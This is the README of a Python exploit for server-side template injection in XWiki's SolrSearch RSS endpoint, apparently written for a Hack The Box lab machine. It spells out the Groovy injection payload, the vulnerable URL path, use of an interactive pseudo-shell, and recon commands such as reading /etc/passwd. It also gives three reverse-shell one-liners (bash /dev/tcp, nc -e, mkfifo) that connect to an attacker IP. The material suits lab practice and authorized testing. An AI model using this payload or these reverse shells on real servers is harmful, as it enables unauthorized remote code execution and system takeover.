Share
## https://sploitus.com/exploit?id=3556E891-79D8-5F88-B0E9-E54AE0DD6A1C
# XWiki SSTI Exploit

A Python exploit for XWiki Server-Side Template Injection (SSTI) vulnerability via Groovy template injection in the SolrSearch endpoint.

## Vulnerability

- **Type**: Server-Side Template Injection (SSTI)
- **Component**: XWiki SolrSearch RSS feed
- **Impact**: Remote Code Execution
- **Affected Version**: XWiki 15.10.8 (and potentially others)

## Requirements

```bash
pip3 install requests beautifulsoup4
```

## Usage

### Test for Vulnerability
```bash
./xwiki_exploit.py -u http://target:8080 --test
```

### Execute Single Command
```bash
./xwiki_exploit.py -u http://editor.htb:8080 -c "whoami"
./xwiki_exploit.py -u http://editor.htb:8080 -c "id"
./xwiki_exploit.py -u http://editor.htb:8080 -c "ls -la /tmp"
```

### Interactive Shell
```bash
./xwiki_exploit.py -u http://editor.htb:8080
```

This will give you an interactive pseudo-shell where you can run commands:
```
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit
```

### Debug Mode
```bash
./xwiki_exploit.py -u http://editor.htb:8080 -c "id" --debug
```

### Command-Line Options

- `-u, --url URL`: Target URL (required)
- `-c, --command CMD`: Execute single command
- `--test`: Test if target is vulnerable
- `--no-verify-ssl`: Disable SSL certificate verification
- `--debug`: Enable debug output

## Examples

**Information Gathering:**
```bash
./xwiki_exploit.py -u http://editor.htb:8080 -c "uname -a"
./xwiki_exploit.py -u http://editor.htb:8080 -c "cat /etc/os-release"
./xwiki_exploit.py -u http://editor.htb:8080 -c "cat /etc/passwd"
```

**Find Interesting Files:**
```bash
./xwiki_exploit.py -u http://editor.htb:8080 -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://editor.htb:8080 -c "ls -la /var/lib/xwiki"
```

**Network Information:**
```bash
./xwiki_exploit.py -u http://editor.htb:8080 -c "ip addr"
./xwiki_exploit.py -u http://editor.htb:8080 -c "netstat -tulpn"
```

**Establish Reverse Shell:**
```bash
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://editor.htb:8080 -c "bash -c 'bash -i >& /dev/tcp/10.10.14.41/1337 0>&1'"
./xwiki_exploit.py -u http://editor.htb:8080 -c "nc -e /bin/sh 10.10.14.41 1337"
./xwiki_exploit.py -u http://editor.htb:8080 -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.41 1337 >/tmp/f"
```

## Technical Details

### Payload Structure

The exploit uses the following SSTI payload structure:
```
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}
```

### Exploitation Flow

1. The payload is URL-encoded and sent to the vulnerable endpoint:
   ```
   /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
   ```

2. The server processes the Groovy template and executes the command

3. The output is captured from the RSS feed response in the format:
   ```
   search on [}}OUTPUT]
   ```

4. The exploit parses the HTML response to extract the command output

## Notes

- Commands are executed as the `xwiki` user (uid=997)
- Working directory is `/usr/lib/xwiki-jetty`
- Some commands may not produce output if they fail or run in the background
- For complex commands, consider using shell scripts or base64 encoding

## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Only use it on systems you have permission to test.